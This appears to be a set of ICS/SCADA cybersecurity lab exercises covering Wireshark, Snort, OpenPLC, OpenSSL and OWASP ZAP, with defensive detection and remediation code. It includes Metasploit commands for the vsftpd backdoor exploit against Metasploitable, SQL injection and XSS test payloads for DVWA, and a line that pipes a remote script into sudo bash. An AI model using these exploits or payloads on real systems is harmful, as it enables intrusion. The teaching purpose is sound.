Cybersecurity Labs for Industrial Control Systems (ICS/SCADA)

Posted by Anonymous and classified in Technology


Experiment 01: Network Traffic Analysis in ICS/SCADA

Tools

  • Wireshark

Objectives

  • Use Wireshark to capture and analyze network traffic to detect anomalies such as unauthorized commands or network scanning.

Deliverable

  • A detailed report of traffic patterns and recommendations for mitigations.

Wireshark

Wireshark is a network protocol analyzer used to capture and inspect data packets in real time.

Installing Wireshark on Linux

  1. Step 01: Update package lists: sudo apt update
  2. Step 02: Install Wireshark: sudo apt install wireshark -y
  3. Step 03: Allow non-root packet capture. When prompted, select to allow non-root users to capture packets. If not prompted, run:
    • sudo dpkg-reconfigure wireshark-common
    • sudo usermod -aG wireshark $USER
  4. Step 04: Restart your session (log out and log back in, or reboot your system).
  5. Step 05: Launch Wireshark: wireshark

Experiment Steps

  1. Initial ping activity.
  2. Being pinged.
  3. Wireshark analysis of the normal packet view (as shown in the lab screenshot).
  4. Wireshark analysis during packet flooding (as shown in the lab screenshot).

Algorithm for Network Traffic Analysis in ICS/SCADA

  1. Start capture.
  2. Monitor for anomalies.
  3. Check for traffic spikes.
  4. Identify broadcast storms or flooding.
  5. Analyze conversations.
  6. Export and document.
  7. Report and recommend.

Hardware Requirements

  • Computer: 16GB RAM, 100GB SSD/HDD, Intel Core i5-3rd Gen (or equivalent).

Software Requirements

  • Operating System capable of running a hypervisor (VirtualBox or VMware).
  • VMware Workstation/Player (or VirtualBox) installation.
  • Disk image file of the virtual machine.

Result

A ping flood shows up in Wireshark as a sustained burst of ICMP Echo Request packets from a single source, far above the baseline rate seen during normal ping activity. Once such a traffic pattern is identified, the source can be flagged for defensive actions such as rate limiting or firewall filtering.
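The detection step of the algorithm above (monitor for spikes, identify flooding, analyze conversations), as an added example that is not part of the lab: a sliding-window counter over packet summaries of the kind exported from Wireshark's packet list. The addresses, timings and the 100-packets-per-second threshold are constructed for illustration.

```python
from collections import defaultdict

# Constructed packet summaries (time in seconds, source IP, destination IP, protocol),
# the columns one would export from Wireshark's packet list. Addresses and timings
# are made up for this example and are not from the lab capture.
NORMAL_PINGS = [(float(i), "192.168.87.10", "192.168.87.131", "ICMP") for i in range(10)]
MODBUS_POLLS = [(0.25 + i, "192.168.87.20", "192.168.87.131", "TCP") for i in range(10)]
# 300 echo requests squeezed into 0.9 s: the ping-flood pattern from the experiment.
FLOOD = [(0.5 + i * 0.003, "192.168.87.50", "192.168.87.131", "ICMP") for i in range(300)]
SAMPLE_PACKETS = NORMAL_PINGS + MODBUS_POLLS + FLOOD


def icmp_peak_rate(packets, window_s=1.0):
    """Peak number of ICMP packets each source sent within any window_s-wide window."""
    times = defaultdict(list)
    for ts, src, _dst, proto in packets:
        if proto == "ICMP":
            times[src].append(ts)
    peaks = {}
    for src, stamps in times.items():
        stamps.sort()
        start, peak = 0, 0
        for end, t in enumerate(stamps):
            # Slide the window start forward until the window spans at most window_s.
            while t - stamps[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        peaks[src] = peak
    return peaks


def flag_flood_sources(packets, window_s=1.0, threshold=100):
    """Sources whose peak ICMP rate meets the threshold: the flood candidates for the report."""
    rates = icmp_peak_rate(packets, window_s)
    return sorted(src for src, peak in rates.items() if peak >= threshold)


def wireshark_filter(sources):
    """Display filter that isolates the flagged sources' ICMP conversations."""
    clauses = " || ".join(f"ip.src == {src}" for src in sources)
    return f"icmp && ({clauses})" if clauses else "icmp"


if __name__ == "__main__":
    flagged = flag_flood_sources(SAMPLE_PACKETS)
    print("peak ICMP per window, by source:", icmp_peak_rate(SAMPLE_PACKETS))
    print("flood candidates:", flagged)
    print("Wireshark filter:", wireshark_filter(flagged))
```

The baseline host peaks at two echo requests per second while the flooding host peaks at 300, so the threshold separates them cleanly; the returned filter can be pasted into Wireshark to pull the offending conversation into the report.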

Experiment 02: IDS Configuration and Testing with Snort

Snort

Snort is an open-source Intrusion Detection and Prevention System (IDS/IPS) that monitors network traffic in real time to detect and block malicious activities.

IDS Configuration and Testing Algorithm with Snort

  1. Install and configure Snort.
  2. Write custom rules.
  3. Validate rule syntax.
  4. Simulate attacks.
  5. Monitor alerts.
  6. Evaluate performance.
  7. Report results.

Software Requirements

  • Operating System.
  • Libraries and tools.

Hardware Requirements

  • Processor: Dual-core.
  • RAM: 500MB or more (for Snort and logs).
  • Network Interface: Intel-branded NIC (or equivalent).

Steps for Execution

  1. Install Snort: sudo apt install snort
  2. Check Snort version: snort -V
  3. Advanced Snort runtime and debugging commands: snort --help-commands
  4. Basic Snort command-line help and usage options: snort --help
  5. Network interface analysis: ip a
  6. Monitoring and analyzing network traffic using Snort:
    • Terminal 01: Start Snort in packet-dump mode on the capture interface: sudo snort -i eth0 -d -e -v
    • Terminal 02: Generate network traffic using the ping command: ping google.com
    • Terminal 01: Press Ctrl + C to stop the capture and print the packet statistics.

Result

The program ran successfully and output was obtained.

Experiment 03: Vulnerability Assessment of Simulated ICS Network

Metasploitable

Metasploitable is a deliberately vulnerable virtual machine designed for testing and practicing penetration testing and security tools like Metasploit.

Hardware Requirements

  • Desktop: 16GB RAM, virtualization support.
  • Router/Switch.
  • Raspberry Pi / PLCs (for simulated ICS environment).

Software Requirements

  • Simulation tools.
  • Virtualization software (e.g., VMware, VirtualBox).
  • Security tools (e.g., Metasploit).

Steps for Execution

  1. Install Metasploitable 2 and get its IP address using ifconfig. Copy the address.
  2. Open Kali Linux and scan the Metasploitable host for open services and their versions: nmap -sV 192.168.87.131 (replace the IP with your Metasploitable IP).
  3. Start Metasploit: msfconsole
  4. Search for the VSFTPD backdoor exploit: search vsftpd
  5. Select the backdoor exploit: use exploit/unix/ftp/vsftpd_234_backdoor
  6. Set the target's IP address (RHOST): set RHOST 192.168.87.131 (replace IP).
  7. Run the exploit: exploit
  8. Run the exploit command again until a successful session is established.

Result

The program ran successfully and output was obtained.

Experiment 04: Securing a PLC Environment

Tools Used

  • OpenPLC: OpenPLC is an open-source industrial controller platform used for programming and running PLC (Programmable Logic Controller) applications.

Software Requirements

  • Available for Windows, Linux, macOS, and real-time Linux.

Hardware Requirements

  • CPU: Dual-core 1GHz.
  • RAM: 2GB.
  • Disk Space: 500MB free.

Installation of OpenPLC Runtime in Kali Linux

  1. Install Git: sudo apt install git
  2. Clone the OpenPLC Runtime repository: git clone https://github.com/thiagoralves/OpenPLC_v3.git
  3. Navigate to the OpenPLC directory: cd OpenPLC_v3
  4. Run the installation script (it prompts for sudo where needed): ./install.sh linux
  5. Check if OpenPLC Runtime is running: ps aux | grep openplc
  6. Check if port 8080 is in use: sudo netstat -tuln | grep 8080
  7. Start the OpenPLC Runtime web server: sudo ./start_openplc.sh
  8. Open your browser and go to http://localhost:8080. The default OpenPLC login page should appear.
  9. Log in with the default credentials (change them after the first login):
    • Username: openplc
    • Password: openplc

Result

The program executed successfully and output was obtained.

Experiment 05: ICS Cyber Attack Simulation and Defense Design

Tools

  • Metasploit Framework
  • Security Onion

Requirements

  • Operating System: Linux (e.g., Kali Linux, Ubuntu).

Metasploit Framework

The Metasploit Framework is an open-source tool widely used for penetration testing, ethical hacking, and security research.

Common Uses of Metasploit

  • Penetration testing.
  • Vulnerability research.
  • Security auditing.
  • Exploit development.

Algorithm

  1. Set up ICS test environment.
  2. Install Metasploit Framework.
  3. Exploit engineering workstation.
  4. Send malicious Modbus commands.
  5. Launch DoS attacks.
  6. Deploy Security Onion.
  7. Analyze attacks.
  8. Implement firewall rules.
  9. Configure IDS/IPS rules.
  10. Rerun attacks.
  11. Document results.
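The detection side of steps 4 and 9 above, as an added example that is not part of the lab or of Metasploit or Security Onion: a small Modbus/TCP parser that flags write function codes coming from any host not on the engineering-workstation allow list, the logic an IDS rule would encode. The frames, IP addresses and allow list are constructed for illustration.

```python
import struct

# Modbus function codes that change process state; reads (1-4) are deliberately left out.
WRITE_FUNCTIONS = {5: "Write Single Coil", 6: "Write Single Register",
                   15: "Write Multiple Coils", 16: "Write Multiple Registers"}


def parse_modbus_tcp(payload: bytes) -> dict:
    """Split a Modbus/TCP frame into MBAP header fields and the PDU that follows it."""
    # MBAP: transaction id (2), protocol id (2, always 0), length (2) counted from the
    # unit id to the end of the frame, unit id (1); the PDU starts with the function code.
    if len(payload) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, pid, length, unit = struct.unpack(">HHHB", payload[:7])
    if pid != 0:
        raise ValueError(f"protocol id {pid} is not Modbus (expected 0)")
    if length != len(payload) - 6:
        raise ValueError("MBAP length field does not match frame size")
    return {"transaction_id": tid, "unit_id": unit,
            "function_code": payload[7], "data": payload[8:]}


def unauthorized_writes(frames, allowed_writers):
    """Return (source, function name) for each write sent by a host outside the allow list."""
    findings = []
    for src, payload in frames:  # (source_ip, tcp_payload) pairs as an IDS would see them
        try:
            pdu = parse_modbus_tcp(payload)
        except ValueError:
            continue  # not a well-formed Modbus frame; out of scope for this check
        name = WRITE_FUNCTIONS.get(pdu["function_code"])
        if name and src not in allowed_writers:
            findings.append((src, name))
    return findings


# Constructed frames, hex grouped per MBAP/PDU field; the IPs reuse the lab's
# 192.168.87.0/24 range but are made up for this example.
SAMPLE_FRAMES = [
    # HMI reads 10 holding registers from address 0: tid 1, len 6, unit 1, fc 3
    ("192.168.87.20", bytes.fromhex("0001 0000 0006 01 03 0000 000A")),
    # Engineering workstation writes register 16 = 100: fc 6
    ("192.168.87.20", bytes.fromhex("0002 0000 0006 01 06 0010 0064")),
    # Unlisted host forces coil 1 ON (FF00): fc 5, the kind of command step 4 sends
    ("192.168.87.131", bytes.fromhex("0003 0000 0006 01 05 0001 FF00")),
]
ALLOWED_WRITERS = {"192.168.87.20"}

if __name__ == "__main__":
    print(unauthorized_writes(SAMPLE_FRAMES, ALLOWED_WRITERS))
```

Because Modbus/TCP carries no authentication, the parser can read every field in clear text; that is exactly why the source-based allow list (and, in Experiment 06, an encrypted tunnel) is what stands between an unlisted host and the coils.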

Steps for Execution

  1. Install dependencies: sudo apt update && sudo apt install -y curl gnupg ruby ruby-dev make libpcap-dev postgresql
  2. Clone the Metasploit repository: git clone https://github.com/rapid7/metasploit-framework.git
    cd metasploit-framework
  3. Install required gems: sudo gem install bundler
  4. Install the bundle: sudo bundle install
  5. Run Metasploit: ./msfconsole

Result

The program executed successfully and the output was obtained.

Experiment 06: Securing ICS Protocols and Communication Channels

Tools

  • OpenSSL
  • Wireshark

Hardware Requirements

  • CPU.
  • RAM: At least 512MB.
  • Storage.
  • Network with internet access.

Software Requirements

  • Operating System: Linux, macOS, or Windows.

OpenSSL Framework

OpenSSL is an open-source toolkit that provides secure communication through the implementation of SSL and TLS protocols.

Key Features of OpenSSL

  • SSL/TLS protocol support.
  • Certificate generation and management.
  • Cryptographic algorithms.
  • Digital signature generation.
  • Secure file encryption and decryption.

Algorithm

  1. Capture baseline Modbus/TCP traffic using Wireshark to understand communication patterns.
  2. Simulate unauthorized Modbus commands to generate malicious traffic.
  3. Set up a secure tunnel to encrypt Modbus/TCP communication.
  4. Reroute Modbus traffic through the encrypted tunnel.
  5. Capture traffic logs.
  6. Analyze and document differences in packet structure, payload visibility, and behavior.
  7. Recommend protocol hardening.

Experiment Commands

  1. Step 01: Install OpenSSL: sudo apt update && sudo apt install openssl
  2. Step 02: Verify installation: openssl version
  3. Step 03: Generate a self-signed certificate: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Experiment 07: Web Application Security for Industrial Systems

Tools

  • OWASP ZAP

Algorithm

  1. Set up OWASP ZAP and configure it as a proxy for web traffic.
  2. Access the ICS web interface through a browser routed via ZAP.
  3. Perform passive scanning to identify visible vulnerabilities.
  4. Run active scans to test for issues like SQL injection and XSS.
  5. Manually test authentication for weaknesses.
  6. Review scan results and identify critical web security flaws.
  7. Document each vulnerability with its risk and affected components.
  8. Provide remediation steps for each issue.
  9. Rescan after remediation to confirm vulnerabilities are resolved.

Hardware Requirements

  • PCs or Laptops.
  • Network equipment.
  • Industrial system simulation environment.

Software Requirements

  • Operating System: Ubuntu (or other Linux distribution).
  • Virtualization software (e.g., VMware Workstation/Player, VirtualBox).
  • Web application stack (e.g., DVWA).
  • Cybersecurity tools: OWASP ZAP, Burp Suite, Metasploit Framework.

Steps for Execution

  1. Search for DVWA (Damn Vulnerable Web Application) in Firefox and follow the installation steps to set it up.
  2. Open the terminal (as root or with sudo). Execute the DVWA installation script (example, actual script may vary):
    sudo bash -c "$(curl -sL https://raw.githubusercontent.com/ethicalhackers/DVWA-script/main/install-dvwa.sh)"
    Then, install ZAP Proxy:
    sudo apt update && sudo apt install zaproxy -y
    Verify Apache2 status:
    sudo systemctl status apache2
  3. In Firefox, navigate to http://localhost/DVWA/.
  4. Set the DVWA security level to "low".
  5. SQL Injection Test:
    • Select "SQL Injection".
    • For User ID, enter: ' or '1'='1
    • Click "Submit".
  6. XSS (Reflected) Test:
    • Select "XSS (Reflected)".
    • For "What's your name:", enter: <script>alert('XSS vuln');</script>
    • Click "Submit".
  7. Open a new terminal and launch ZAP Proxy: zaproxy
  8. Once ZAP opens, select the "Automated Scan" option.
  9. Enter the URL to attack: http://localhost/DVWA
  10. Click "Attack".
  11. After the scan completes, select "Generate Report".
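Steps 5 and 6 above, and the remediation that step 8 of the algorithm asks for, as an added example that is not part of the lab or of DVWA (which is written in PHP): an in-memory SQLite stand-in for the DVWA users table shows why the page's User ID input returns every row when it is spliced into the query, and why a bound parameter and HTML encoding close the two findings. The table rows are constructed.

```python
import html
import sqlite3

# The two inputs the experiment submits to DVWA at security level "low".
SQLI_PAYLOAD = "' or '1'='1"
XSS_PAYLOAD = "<script>alert('XSS vuln');</script>"


def make_db():
    """In-memory stand-in for DVWA's users table; the rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("1", "admin", "admin"), ("2", "Gordon", "Brown"), ("3", "Hack", "Me")])
    return conn


def lookup_vulnerable(conn, user_id):
    """DVWA 'low' pattern: the User ID is spliced straight into the SQL string."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user_id):
    """Remediation: a bound parameter is data, never SQL, so the payload matches no row."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def render_greeting(name):
    """Remediation for the reflected XSS page: encode before reflecting into HTML."""
    return f"<pre>Hello {html.escape(name)}</pre>"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, SQLI_PAYLOAD))        # every row leaks
    print("parameterized:", lookup_parameterized(db, SQLI_PAYLOAD))  # []
    print(render_greeting(XSS_PAYLOAD))
```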

Result

The program executed successfully and the output was obtained.
